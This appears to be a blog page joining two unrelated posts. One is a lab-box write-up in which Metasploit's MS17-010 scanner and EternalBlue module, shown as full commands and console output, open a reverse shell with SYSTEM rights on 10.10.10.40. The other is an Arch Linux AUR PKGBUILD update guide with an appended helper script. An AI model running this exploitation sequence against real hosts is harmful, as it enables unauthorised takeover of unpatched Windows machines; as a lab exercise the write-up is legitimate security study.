VideoLAN VLC Client (Windows x86) - 'smb://' URI Buffer Overflow (Metasploit)                                                                        | exploits/windows_x86/local/16678.rb
VideoLAN VLC Media Player 1.0.0/1.0.1 - 'smb://' URI Handling Buffer Overflow (PoC)                                                                  | exploits/windows/dos/9427.py
----------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result

I have highlighted the most interesting exploit: MS17-010 EternalBlue.

MS17-010 EternalBlue Investigation

Metasploit

COMMAND

msfdb 

RESULT

msf5 > search ms17-010

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                              normal   Yes    MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution


msf5 auxiliary(scanner/smb/smb_ms17_010) > options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                       yes       The target address range or CIDR identifier
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads

msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 10.10.10.40
rhosts => 10.10.10.40
msf5 auxiliary(scanner/smb/smb_ms17_010) > options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS       10.10.10.40                                                     yes       The target address range or CIDR identifier
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads

msf5 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 10.10.10.40:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_ms17_010) >

msf5 auxiliary(scanner/smb/smb_ms17_010) > search ms17-010

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                              normal   Yes    MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution


msf5 auxiliary(scanner/smb/smb_ms17_010) > use 2
msf5 exploit(windows/smb/ms17_010_eternalblue) > options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target address range or CIDR identifier
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.10.10.40
rhosts => 10.10.10.40
msf5 exploit(windows/smb/ms17_010_eternalblue) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf5 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 10.10.14.6:4444
[+] 10.10.10.40:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445 - Connecting to target for exploitation.
[+] 10.10.10.40:445 - Connection established for exploitation.
[+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.10.40:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.10.40:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.10.40:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1
[+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.10.40:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.10.40:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.40:445 - Starting non-paged pool grooming
[+] 10.10.10.40:445 - Sending SMBv2 buffers
[+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.40:445 - Sending final SMBv2 buffers.
[*] 10.10.10.40:445 - Sending last fragment of exploit packet!
[*] 10.10.10.40:445 - Receiving response from exploit packet
[+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.10.40:445 - Sending egg to corrupted connection.
[*] 10.10.10.40:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (10.10.14.6:4444 -> 10.10.10.40:49158) at 2019-09-08 09:37:05 +0100
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>hostname
hostname
haris-PC

C:\Windows\system32>

Conclusion

This box was exploited using EternalBlue, making use of two Metasploit modules: the MS17-010 scanner to confirm the host was vulnerable, and the EternalBlue exploit module to obtain a SYSTEM shell.

Updating an Existing AUR Package File for Arch Linux

Flag the Current AUR Package as out-of-date

Login to the AUR website and flag the current package as out-of-date to ensure everyone is aware of the package status.

Download the Latest Version of the PKGBUILD File

For example, when using the yay AUR helper, run the following command to download the latest version of the PKGBUILD file from the AUR.

$ yay -G NAMEOFPKG

Update the Relevant Elements of the PKGBUILD File

For example update the version number via the pkgver variable.

Generate All CHECKSUMS and Insert into the PKGBUILD File

Use the below command to generate the required CHECKSUMS.

$ makepkg -g -f -p PKGBUILD

Update the CHECKSUMS within the PKGBUILD file where appropriate.

If Required Download all AUR Dependencies

Ensure all dependencies that themselves come from the AUR are accounted for by installing them with the AUR helper, for example:

$ yay -S PKGNAME

Use makepkg to Install the Package with all dependencies from pacman

$ makepkg -sri -p PKGBUILD

The package should now be installed on your PC. Please consider emailing the current maintainer with the updated code, requesting that they review it and update the official PKGBUILD file.
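The version, release and checksum edits from the steps above, automated in one POSIX shell helper as an added example that is not part of the original post or of the AUR tooling; the function names bump_pkgbuild and pkgbuild_var and the sample PKGBUILD are constructed, and the checksums are passed in by hand after being compared with what upstream publishes rather than copied straight from makepkg.

```shell
#!/bin/sh
# Added example, not part of the original post: rewrite pkgver, pkgrel and
# sha256sums of a PKGBUILD in one pass. Function names are hypothetical.
# The caller supplies the checksums: compare what `makepkg -g` prints with the
# checksum upstream publishes (or verify the tarball's signature) before
# pasting it in, since makepkg only hashes whatever was downloaded.

# bump_pkgbuild FILE NEW_VERSION SHA256 [SHA256 ...]
# Assumes the sha256sums=( ... ) array sits on a single line.
bump_pkgbuild() {
    file=$1; newver=$2; shift 2
    sums=""
    for s in "$@"; do
        # accept only lowercase 64-character hex, so a pasted "SKIP" or a
        # truncated hash is caught before it lands in the build file
        case "$s" in *[!0-9a-f]*) echo "bad sha256: $s" >&2; return 1 ;; esac
        [ "${#s}" -eq 64 ] || { echo "bad sha256 length: $s" >&2; return 1; }
        sums="$sums '$s'"
    done
    sums=${sums# }
    awk -v ver="$newver" -v sums="$sums" '
        /^pkgver=/        { print "pkgver=" ver; next }
        /^pkgrel=/        { print "pkgrel=1"; next }   # new upstream release resets pkgrel
        /^sha256sums=\(/  { print "sha256sums=(" sums ")"; next }
        { print }
    ' "$file" > "$file.tmp" && mv "$file.tmp" "$file"
}

# pkgbuild_var FILE NAME: print the value of a simple NAME=value assignment
pkgbuild_var() {
    sed -n "s/^$2=//p" "$1"
}

# Demo on a constructed PKGBUILD (placeholder project, not a real package)
demo_dir=$(mktemp -d)
cat > "$demo_dir/PKGBUILD" <<'EOF'
pkgname=examplepkg
pkgver=1.0.0
pkgrel=3
source=("https://example.invalid/examplepkg-$pkgver.tar.gz")
sha256sums=('SKIP')
EOF
bump_pkgbuild "$demo_dir/PKGBUILD" 1.1.0 "$(printf '%064d' 0)"
cat "$demo_dir/PKGBUILD"
```

Run `makepkg -sri -p PKGBUILD` afterwards as in the step above; makepkg will refuse the build if the checksum you entered does not match the downloaded source, which is the check you want.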